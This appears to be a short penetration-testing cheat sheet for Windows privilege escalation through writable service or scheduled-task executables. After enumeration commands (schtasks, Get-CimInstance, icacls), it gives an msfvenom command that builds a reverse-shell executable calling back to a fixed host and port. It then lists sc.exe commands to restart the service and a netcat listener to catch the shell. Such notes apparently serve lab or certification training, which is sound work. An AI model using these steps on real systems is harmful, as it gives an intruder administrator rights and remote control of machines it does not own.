• check programs on scheduled tasks
  • schtasks /query /fo LIST /v
  • Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
• Check permission (full or writable) of programs found
  • icacls <full-path>
  • icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
• transfer any adduser.exe executable and rename it with exploitable exe name
  • OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe
• sc.exe stop <service-name>
• sc.exe start <service-name>
• nc -nvlp 139 if reverse shell exe is used